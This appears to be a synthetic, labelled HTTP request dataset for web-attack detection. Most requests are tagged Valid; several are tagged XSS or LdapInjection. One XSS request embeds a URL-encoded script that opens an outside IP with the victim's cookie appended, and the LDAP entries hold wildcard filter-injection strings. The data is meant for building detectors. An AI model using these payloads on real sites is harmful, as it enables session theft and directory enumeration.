If-Unmodified-Since: Tue, 01 Feb 05 09:04:03 CET
If-Match: "0vvVwT.9LXEtsKHKX"
If-None-Match: *
If-Range: "NRMcI.WBGMr@WMFo8oDy"
Max-Forwards: 7885
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dG53UndvZElkNWhvbzBoSXNuYXR6b3JhbGFocHVlaGhrbA==
Authorization: Digest cnonce="cufcn"
Range: 637-,71710-966266
Referer: http://e2hgwie.ch/esfo/2edodph/Dm24tt/pwyr/Sdoe0Mi.jpeg
TE: gzip;q=0.3
Trailer: If-Range
User-Agent: r0ii58Mr
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2303x311
Via: 8.6 240.49.9.215:609, 8.2 130.121.190.185
Transfer-Encoding: lwloi; Hereqvee=Islz4EH4
Upgrade: woeUzU/1.5, tnls/8.6, B9a/0.3
Warning: 189 59.44.75.168 "mazmEztho0mt0svdfi" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19187
Start - Id: 25483
class: Valid
GET /_OmAmv9ZL/paaear/iawhlon8/uddeeiern/iyEssCve/t_BAA/fi0Uusreonxinienld/aK4-5/Dlpca.tiff? HTTP/1.1
Host: 86.124.197.128:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ns3r0mln-oscya;q=0.4, tEsHAhow-mar24bn, rA-et, h-waWq3l;q=0.9, wttui9ni-lsgnru;q=0.0
Cache-Control: only-if-cached
Client-ip: 235.222.69.4
Cookie: qbfvhruncyjqyen=tcsweenaiMt;LfTN=c:thdibodypeftptsjbpomail19
Cookie2: $Version="8"
Date: Mon, 16 Aug 04 01:11:49 GMT
ETag: W/"NeeL9UfNwl6yKjG"
Expect: 100-continue
From: qinstr2@tr2acan.st
If-Modified-Since: Sun, 29 Jun 08 02:03:23 CET
If-Unmodified-Since: Tue, 30 Aug 05 22:40:00 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Dec 09 22:58:48 CET
Max-Forwards: 86
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWNjdHNqOm90alM0
Authorization: Basic aXd5YUVTZWE6dWFlbWxPbnU=
Range: 20-37,837459-2783
Referer: /ytdq/ntjeay/otrsEnl.php3
TE: chunked;q=0.3,chunked
Trailer: Via
User-Agent: 9hroyl. http://www.anCisE.net
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: HTTP/3.2 www.ir4jro9.htm, 8.0 www.VtOak.html:54
Transfer-Encoding: identity
Upgrade: poia/3.0, sw5a/3.4, 4xe4H/9.6, rhy/2.2, 6ot/7.2
Warning: 898 81.55.160.68 "e9az1gc0lmr7ohaclob" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25483
Start - Id: 8692
class: Valid
GET /sZF1atg/a2FNq9KvOhqod.mspx?eeOplO=3466467&2K7JH-VOacceptne=38816996&a1mCs=192&Eedsid6teo21Ah=dtirePbemsnl&A73Klmt-Wgzo=17&bhQ=68260&soihxtr=srsa9ksG2dau&mnformCVpKs=819763099&enclh=0&lttFhT2Acr3s=eQfa-A&btiixyoahwcsp=7691 HTTP/1.1
Host: 46.98.112.97
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ehiwai-au, j8wS7-p5umna
Cache-Control: ddiP6=btUa
Client-ip: 173.156.22.51
Cookie: ZorMRtmp=sdc;dEl1nnStEA=143657;s-7B=be;ebrrinoelleu=esf3eId;Rocriqtjt=qp;ndsd0dznraik=Leny
Cookie2: $Version="55"
Date: Wed, 01 Jul 09 17:00:31 GMT
ETag: W/"iEY.oi6B6Dsil3ru0"
Expect: 100-continue
From: abHee@dqDytats.biz
If-Modified-Since: Tue, 17 Jul 07 02:00:31 UTC
If-Unmodified-Since: Tue, 15 Jun 04 17:42:58 CET
If-Match: "Nm1SL8a321nhjIeJ"
If-None-Match: "RQOacf_oWTP-XOApXa_y"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.6
Pragma: poefdG='NoEh3'
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: Digest response="Ddfb6825F7500BbE88EdfA4D6DbD0162"
Range: -1251,-8,78356-
Referer: /pmEp/oitos/owenu/gnas/asad7jO.jsp
TE: chunked;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/5.9 (X11; U; Linux i586 6.3; P1-jp; rv:0.7.9) Gecko/13983117
UA-CPU: PowerPC
UA-Disp: 3582,4284,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8393x485
Via: 1.1 157.80.207.101:07, HTTP/1.6 7.9.86.65
Transfer-Encoding: deflate
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8692
Start - Id: 15979
class: Valid
GET /eiZy0oSD/jXo2we5c/unT5E17Mr2lsor/U@Ba/Ne/ltdseNewdcd/cVk.tiff?G6hsFGtboot.ini6dFz=optspbcaer HTTP/1.0
Host: 84.120.124.161
Connection: isomwe
Accept: application/zip;q=0.2, video/quicktime, application/zip
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.0, deflate;q=0.6, compress;q=0.6
Accept-Language: *;q=0.1
Cache-Control: min-fresh=70531
Client-ip: 31.122.98.168
Cookie: YVscopt=d7B;6eaGeutotleea=o7kwzh
Cookie2: $Version="071"
Date: Sun, 12 Dec 04 07:20:01 GMT
ETag: ".Bv@UTeq1ecGMZfx"
Expect: iaaznme
From: a2ehh@xsait.it
If-Modified-Since: Fri, 10 Dec 04 22:58:44 GMT
If-Unmodified-Since: Fri, 26 Mar 04 06:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Mar 06 16:50:50 GMT
Max-Forwards: 9
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: NTLM bXNycnM3bHd0b2hubmFuZXlGajM0T2duTGUyOHRjYXlvaXJmZGVaSXRxZGZ6dWJh
Range: 08-06,-75180
Referer: http://www.to6i6dme.com/ejse/no87es.tiff
TE: chunked;q=0.8,chunked;q=0.5,chunked
Trailer: User-Agent
User-Agent: Mozilla/6.6 (Windows; U; Win98 9.4; sl-le; rv:3.6.6) Gecko/38930204
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1814x7324
Via: FTP/3.5 www.inhEs.htm
Transfer-Encoding: identity
Upgrade: draal1/9.2, 8stse/6.9, tvz7o/8.5
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 167.197.130.101
X-Serial-Number: 606819653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15979
Start - Id: 23042
class: Valid
GET /saV5-Vo5/e5LVlyO7qpr.YyJ.O/e4xU/Estyleshutdown4M/f0lw_r/ty38niEUA4X_zBG-_/mhicrS/u7mhswon.tiff?eueseat=bgsound8iomoen2etc&xt4enTRn2ooemSh=Eir0ie9&Mlai=+-c%7Cl&nhioileoorol8=9840322&ido8HMAkDse=1&1o53tpvoe=315748 HTTP/1.0
Host: 75.242.170.66
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-icelandic, macintosh;q=0.8, cp-936;q=0.5, iso-8859-8, iso-8859-8-i
Accept-Encoding: 
Accept-Language: ler-w;q=0.8
Cache-Control: no-transform
Client-ip: 248.26.245.48
Cookie: 7h=6898230339;teraspdh=yhN$a
Cookie2: $Version="4"
Date: Thu, 05 Nov 09 24:17:00 CET
ETag: W/"n5AlUPX6@foZc5J"
Expect: tooei=occorw
From: itlt@Trihh.org
If-Modified-Since: Mon, 01 Feb 10 07:35:46 CET
If-Unmodified-Since: Sat, 28 Oct 06 22:29:04 UTC
If-Match: "nQPbH7fVdWl2SfKIp6"
If-None-Match: "O7UN0KJS@ISXtwjzIXSM"
If-Range: Thu, 15 Apr 04 19:17:24 CET
Max-Forwards: 956
MIME-Version: 2.9
Pragma: v=ek7
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: biOae coaoes=ht5vi
Range: -41
Referer: http://www.qHWtoj.gov/egoea2y/oJLo/uhkust3/pr24Roej/nrtTa.php3
TE: deflate,gzip;q=0.0
Trailer: From
User-Agent: yeaaltehne
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6076x9120
Via: HTTP/5.5 www.iasDRaa.html, FTP/4.1 www.eTeehepu.css, ant5ks/5.3 59.157.153.143
Transfer-Encoding: identity
Upgrade: hjG/0.3, nce65/6.8, e8Uee/4.6
Warning: 333 9.162.131.93 "Ealtwieflwome" 
X-Forwarded-For: 55.241.109.189
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23042
Start - Id: 9930
class: Valid
GET /po0H5eXd6L0e.9N/ef6Eo@urDe_9SnbyS0B/yNmZpE1qHPR_rll/5EXcK6bGOBN/rK9Q6/Stwashta/LwJy.html?82window.open5admin=onhjn&yYH7=d0ft HTTP/1.1
Host: www.SlacocOj8i.fr
Connection: ermt
Accept: image/*;q=0.4, text/xml, application/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, compress, compress;q=0.2
Accept-Language: *
Cache-Control: rtvkZ0e='3efhll8'
Client-ip: 196.18.89.25
Cookie: eo=hytuqpbeen7a;b3DnqsobjectE=teobo agroup by|slr6;xmlDX0dWj1=13;msung=$ud GgodwOftcynnve3;ij6a0=sPm;mw=zs\en'eOnull[vbscripterL;
Cookie2: $Version="2"
Date: Thu, 15 Jul 04 12:07:47 GMT
ETag: W/"VaeJTs-1Felkis9K4d"
Expect: m8dkgye
From: hoyaen@w8anmIEhtt.org
If-Modified-Since: Tue, 09 Aug 05 13:41:12 UTC
If-Unmodified-Since: Mon, 13 Aug 07 10:33:01 CET
If-Match: "q7Ru@ZGoPe_YlNBq"
If-None-Match: "V7F7DMi4XjMGXGU_"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 42
MIME-Version: 3.5
Pragma: ttr=umnqdtof
Proxy-Authorization: Digest realm
Authorization: NTLM bmllVWNpZGZpN2hlaWF1YnQzdGlpd28xYTZ2cnhlUWhlZGlyYnNu
Range: -073,-7284,0-
Referer: /OgiD5g/npiiyr/so2d6ao.zip
TE: trailers,trailers
Trailer: Range
User-Agent: vansuedophwvl
UA-CPU: x86
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9878x2759
Via: 4wuauq/2.3 76.58.5.224:3678
Transfer-Encoding: eefctd
Upgrade: auldc/3.6, reoo/4.9
Warning: 686 www.us5nnEN.png "k1yrainailei9eertt" "Sun, 19 Jul 09 15:32:04 CET"
X-Forwarded-For: 37.141.36.131
X-Serial-Number: 443764018144231043
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9930
Start - Id: 29052
class: Valid
GET /irmax6s1amitx45alaoy/reaWnde/duahrfuh0rny/eddQholmmhres.swf?R9at=rueL4.mI7E&snveXbortTeIgs=tocs&_JlsvXh1=inh%3A4%5Ccaty%3A&h5c=xmlp&4W85m=e+7d%24ob7gi%29aare6hei&Jzythmoqr1gcHE=h6_ABSn&SzRdocumentD9=ectaEdrs3ajsfshmc&eodagl6gNdgh=v+hr+&fbngT=npdh%28e+e8une%5Cp&3j8iframe@VPCI3=613092656&rrdacteRtSbi2=824037&i9eel2hkheTcaot=akCgqF&dqyot4=84156&WMWx@nautoexecYJo=414&q6tnra6kt=mh3Z1Xhec HTTP/1.0
Host: www.esp0.fr
Connection: close
Accept: video/mpeg
Accept-Charset: x-mac-icelandic;q=0.3, big5, euc-tw;q=0.4, x-mac-ce, windows-1255;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: et-xj;q=0.7, esntar-4d;q=0.1, ih1l3dE-in;q=0.5, rkue-h;q=0.2, io-te8xHsPi
Cache-Control: max-age=29737
Client-ip: 70.47.116.196
Cookie: pa=catssA dme?65;NyhoonenemEans=jIw2P-8u
Cookie2: $Version="78"
Date: Tue, 15 Sep 09 01:36:26 CET
ETag: "pbgdGJW_3U-VuSg"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 23 Jul 09 05:45:01 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Apr 05 23:47:59 GMT
Max-Forwards: 0195
MIME-Version: 5.4
Pragma: eheo8cn='io'
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic dllkbjppN3l0cg==
Range: 2-728395,2-644,-332
Referer: /miolerr/Nterl.js
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (X11; U; Linux i386 8.8; nc-st; rv:5.3.6) Gecko/80669752
UA-CPU: x86
UA-Disp: 3428,2745,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: wba4we/8.4 www.lnd4a.tiff, 4.2 www.n4zd.tiff:9203
Transfer-Encoding: 1nsoa; ruuson=solet
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 278 www.tcotssn.tiff "t1rotxxS" "Thu, 11 Nov 04 16:16:21 UTC"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29052
Start - Id: 47847
class: XSS
GET /SrI/r6MH.aspx?2srdteuz=LiartsE6meaossf&RuEELlV=hi&BftpFexechtpassnq-=%3Cinput+++++type++++%3D+++%22image+++%22+++dynsrc++%3D+++%22+++++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F90.181.121.43%2Fndta.php4%27%2Bdocument.cookie%29%3B%5D++++%22%3E&Rontio=71076&EBazBpAXpositionxs=368&sho5Ilieg=ucaaiisEgsovT&rnndRexhoiotad=71717&7lmetqOzAw=2&6ddtlalUob3sur=edrymet5&iTS0leotrt=lRH6ZjBE3b3&hnretiuttiocn6=8 HTTP/1.1
Host: www.Anaod.com:8438
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: macintosh;q=0.5, iso-8859-4, x-mac-ce;q=0.8, utf-8
Accept-Encoding: 
Accept-Language: ntberr-it8x4;q=0.4
Cache-Control: max-stale
Client-ip: 106.34.137.82
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Sat, 14 Aug 04 12:37:00 CET
ETag: "c4Wi6no_@51d.A@3Mpf"
Expect: uetaedh
From: rntaoh@dim7.fr
If-Modified-Since: Fri, 15 Aug 08 11:35:41 CET
If-Unmodified-Since: Sat, 23 Apr 05 21:38:40 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Mar 08 18:12:35 GMT
Max-Forwards: 70
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: Basic YWVlaW9DOmlUZWU=
Range: 87782-,-880675
Referer: http://aheits.fr/sfgeuhc/nG8th/qfonr/he3pO/excln.php3
TE: deflate;q=0.8,trailers
Trailer: Cache-Control
User-Agent: fbHyenetu/3.4.0
UA-CPU: x86
UA-Disp: 4309,162,32
Via: tmfsf/7.6 www.Onitn.tiff
Transfer-Encoding: compress
Upgrade: Xtfkh/8.2, Oni/6.3, dia/4.0, rase/7.9
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47847
Start - Id: 38605
class: LdapInjection
GET /ptuSZJYgi@QufdE/z1cl1U4KB6r8.htm?3dm4bs6qi0osE=l%3CrepCbnprocessing-instructionud%24tle%2F&nueOho=%29%28%7C++++%28displayName%3Dhad*%29%28name++%3D+++had*++++%29%28++mail%3Dhad*++++%29&A8=ftpz%7Eipkheexecvtmpltcat&shi4see0si=e2Sw2t&boot.inip3_aIN0Ohlocation=16150 HTTP/1.0
Host: www.uwd5ysE.de
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: deflate;q=0.8, deflate, identity;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 224.106.158.13
Cookie: 9ubmohnc7iA7j=teTsri5U;bqxqaeeer7=3091862;od2seoiun=Q 2sSxp eR
Cookie2: $Version="8"
Date: Sat, 16 Apr 05 23:08:17 CET
ETag: "G1iBnQMqHdqiJ.4EMG2"
Expect: trilhrm
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 17 Mar 07 19:18:02 GMT
If-Unmodified-Since: Sat, 21 Jun 08 05:38:38 GMT
If-Match: *
If-None-Match: "AYuvFT476f8JM.m"
If-Range: Sat, 25 Jun 05 18:21:41 CET
Max-Forwards: 0
MIME-Version: 8.6
Pragma: wHdis='i'
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: /soi9se2e/ess0/cTlzeeer.php3
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 2.6; ce-Ao; rv:7.1.4) Gecko/74217874
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2570x635
Via: HTTP/3.3 www.ce5Ee.jpg, FTP/5.5 105.60.88.188
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38605
Start - Id: 14718
class: Valid
GET /tiYpe3bblpo/0oAaEneUrttimneuplpe/Bscriptf/fn/evotr12r/BFvpositionbIallxp_BTssvbscript/arQ6Li2SOsG4pL/ylikeR@KCjKJZSPfPinput/unmgzAeoasneds/sr.gif?sheco=9&eETntl8ynw5=49141&3MZmtOlu2k=as+&NAGf6cutmssrnrs=ge&ioaoa7ehkh3u3=7&hB9n1hhc=onA&ml=214439&ehln=+vs&Ha=8198&OincludezO=piE7uotguaReenefxy&GFng=tbsshpsz HTTP/1.0
Host: www.elofbl.be:045
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 53.111.94.29
Cookie: hcilTouGt5e=8302496301;otesttdGnein=ncd3ucn
Cookie2: $Version="6"
Date: Mon, 06 Jul 09 24:25:24 UTC
ETag: W/"CjXd5ytRG8C2ENF8MV"
Expect: oiheoS=SOre;era8=iynroe
From: zar3wadE@0eyihva.cz
If-Modified-Since: Tue, 22 Jun 04 19:50:44 GMT
If-Unmodified-Since: Wed, 27 Dec 06 10:21:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9940
MIME-Version: 3.2
Pragma: u='4t'
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic bmxsYTppZXVlZg==
Range: 07-
Referer: http://www.to44t.cz/aiaedo/oooi.jsp
TE: chunked
Trailer: Pragma
User-Agent: qnUaiberna/0.1.5.9.2
UA-CPU: x86
UA-Disp: 733,9202,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0368x227
Via: HTTP/2.0 168.255.1.26, HTTP/9.9 www.mtcaaza.htm, 7.0 www.p8lh9n.shtml
Transfer-Encoding: at6Est; wpac=yretchmm
Upgrade: isiavm/4.5, oOb/6.3
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14718
Start - Id: 38338
class: LdapInjection
GET /ijG1QVKtOWUX1MI.pUjD/scriptBWMd7IzvstyleZR/rLEPG8emt.4BvDUkp/9Snoet.exe?k0hZO5%ukxQ=4&NtSLTitrpiicntr=andRe4&8xo7feEe=u2jm%40&m38agEb=aqZ9&leojdtfdegsjv=5627&maoE=iwascowoecFe0adt&X@X4w=bgnns&sectlrI4xmrsg=oseaeR&w1tysoaDhew=512&m0rnPtobi=rCA-rxjV&ntic=HuOreplacet%40nedhfq%3F&souDdhthdag=324p0ILG&tHXlVformbIn=%29++%28+%7C+++%28++cn%3D*o++++%27brien*++++%29%28mail++++%3D*o%27brien*+%29+&dj=tlBaiiheinwhar&_QAusrxF6=sUnspenNs++ HTTP/1.0
Host: 70.238.153.220
Connection: close
Accept: video/*;q=0.5
Accept-Charset: windows-1254, x-mac-arabic;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 116.63.205.12
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="689"
Date: Thu, 23 Dec 04 01:01:30 CET
ETag: "WbPrN@xJVi3tQ@DS"
Expect: krvt=nsetrd;ejpTaih
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 13 Jun 09 05:20:33 CET
If-Unmodified-Since: Wed, 11 Mar 09 16:47:28 UTC
If-Match: *
If-None-Match: "EW-SDSWc9ivJO@zKJ@"
If-Range: *
Max-Forwards: 36
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: thnpao e7eGhet=ha4hIt
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: -159254,-412692
Referer: /nurkaEj/1hri.asmx
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/5.0 (compatible; MSIE 6.8; Open BSD i386; ubeaea; cvzs)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6454x625
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: identity
Upgrade: t6h/8.7, dvd/6.5, em9l/7.2
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38338
Start - Id: 909
class: Valid
GET /hq_-su4uRGHdThR/5WxEFa4hhaOQA.cfm?r-sknWL=jen7aii&1nCosthootapc9h=nlocationwssolike+oe5s9topen&tooHaoqnoil=q+se3&een0wdbtoo8drtv=6 HTTP/1.0
Host: 212.207.182.174
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.8, cp-936;q=0.3, euc-cn, iso-8859-7;q=0.9
Accept-Encoding: 
Accept-Language: oicE-seae;q=0.1, sMef-tort;q=0.0, reooe-t6, hniMi6-Sa, tl3-Ttssgs1a
Cache-Control: httdRe=eCqtrsK
Client-ip: 229.167.62.39
Cookie: ssEftoa1sf1ax=lochttpeJ7 9scripte0ycopyl>dmibody;Ieoxomoefne4hn=ie;eRnieemeygni1r=hhtanvhnir;gyShguTihae=o@f;mexjelehshdroe=7;4vl6es.51I=?iicle
Cookie2: $Version="98"
Date: Sun, 19 Dec 04 07:51:02 UTC
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: njNas@wal1m.uk
If-Modified-Since: Fri, 07 Nov 08 11:08:04 UTC
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: *
If-None-Match: "iRdYS0NmnZokpzCzzT"
If-Range: *
Max-Forwards: 30
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: Basic UnRldDpyaXIzRTM=
Range: 6-,8198-40078
Referer: http://www.aadkoo.gov/Ubheand.bin
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/5.2 (X11; U; Linux i386 7.2; ei-ie; rv:5.6.9) Gecko/37263331
UA-CPU: PowerPC
UA-Disp: 1003,145,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1573x8135
Via: 0.3 242.11.66.68, 0.1 www.ohmosr.css, HTTP/8.7 168.23.49.75
Transfer-Encoding: 8ouzp
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 020 www.rnasi.htm "efazM1mttcshlaeedu" "Tue, 29 Jan 08 23:57:59 GMT"
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 909
Start - Id: 33026
class: Valid
POST /dRy9uSKEp9P1@6mL5/nrit7alee/execyvLmochapGbD@wK/eI-N4e.j/p1U2bo1dsyndno/aety/m68VJlW4/d7dg-haKNgVO2An.cgi? HTTP/1.1
Content-Length: 304
Content-Language: tstzii9r,ecdfbee,al9a
Content-Encoding: identity
Content-Location: http://bbvliHe.it/rap0lfsi/admiN3/h8tonS.swf
Content-MD5: MThFaENybjFpcmhlZWZlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Nov 07 07:42:02 UTC
Last-Modified: Mon, 13 Mar 06 14:33:44 CET
Host: 125.23.11.58
Connection: close
Accept: video/*;q=0.9, text/*;q=0.4, audio/basic;q=0.4
Accept-Charset: hz-gb-2312;q=0.8, iso-8859-5
Accept-Encoding: 
Accept-Language: a-er5eooja, mblmtr-abai, ieieiotr-9eerva, Vw-hhshake9;q=0.0, onpfuaTo-edAewaer;q=0.9
Cache-Control: no-store
Client-ip: 75.232.39.149
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="120"
Date: Mon, 15 Sep 08 09:51:09 GMT
ETag: W/"bfar_.dwjdJ58ItK"
Expect: 100-continue
From: ihYUAw@ivSmbM.it
If-Modified-Since: Sun, 02 Sep 07 12:33:34 CET
If-Unmodified-Since: Wed, 01 Apr 09 24:05:24 CET
If-Match: *
If-None-Match: "SWE7fUU4q742qC87"
If-Range: "JgEfX7pCK3UeZLQQd"
Max-Forwards: 4
MIME-Version: 0.6
Pragma: yl='nh'
Proxy-Authorization: Basic YmRDcWFlOmVnZWQ0bmU=
Authorization: Digest algorithm=iehrofze
Range: -653509,070-
Referer: http://www.Oaym.biz/lHepwtcH/8kqahE/yedtaetk.nsf
TE: gzip,trailers
Trailer: User-Agent
User-Agent: uxslmn/2.1.4.9
UA-CPU: MIPS
UA-Disp: 8116,2322,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 699x4175
Via: 6.1 www.ni5fttj.jpeg:7195, HTTP/5.1 25.209.24.244, HTTP/6.2 20.197.169.82
Transfer-Encoding: identity
Upgrade: ceysO/0.3, sherw/9.0, 9Ojtfs/4.0, eslfme/3.1
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 01279486631284
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d3yGemg1memhc4a=0244684&0pQxnX52v-=f<r&nritAn6sar=tlogf:hituFluintosTrtg&shutdownJ7group by4dvAlogVlb=qbln&aeedOia6sgeoCe=srcp5&szdOu=nodedatieahnh&k2documentSn3YRa83=\je&f4g6seE=eynw3nhdqt&AaeeoeF=seC4oElb&8re0ef95looooi=i65@vTjH2&Zyotutepb1sLnat=d&n8=:$)tren1em9uiN&ttloemaendreo=86854088

End - Id: 33026
Start - Id: 3309
class: Valid
GET /unionCJ0aGng/m6.Dj0TlRW1WnGI/eSsgq/mq/cicsNsxe/oCf3Xu5GisgTUeXGddB/9Ny.cV@ewVwHtD5/eoesrtuheul/inaoterfaid0y/auet6dk6Alh/EnroNnl/O1as.js?nESintbiEme=ae0ntaineoeh&nta1hrabtdeea=5745209&3tenaiuiene=7082 HTTP/1.0
Host: 228.187.28.8
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sah5nae-okn6, ls7h-tu;q=0.2, nleuodsn-ae9h;q=0.6, dtD0n-hioiGya;q=0.6, ue-gwrno1H;q=0.1
Cache-Control: no-store
Client-ip: 134.201.181.61
Cookie: c0ittsRtia=136381;taIwtfesaeoaah= r;ajenShtrlrev=992534642;riheeirAo1lnte='e7ro;lumt=288913
Cookie2: $Version="250"
Date: Mon, 02 May 05 16:34:15 GMT
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: obew1
From: gooi@er7rmrhs.st
If-Modified-Since: Mon, 12 Sep 05 16:36:19 CET
If-Unmodified-Since: Mon, 22 Aug 05 02:01:58 CET
If-Match: *
If-None-Match: *
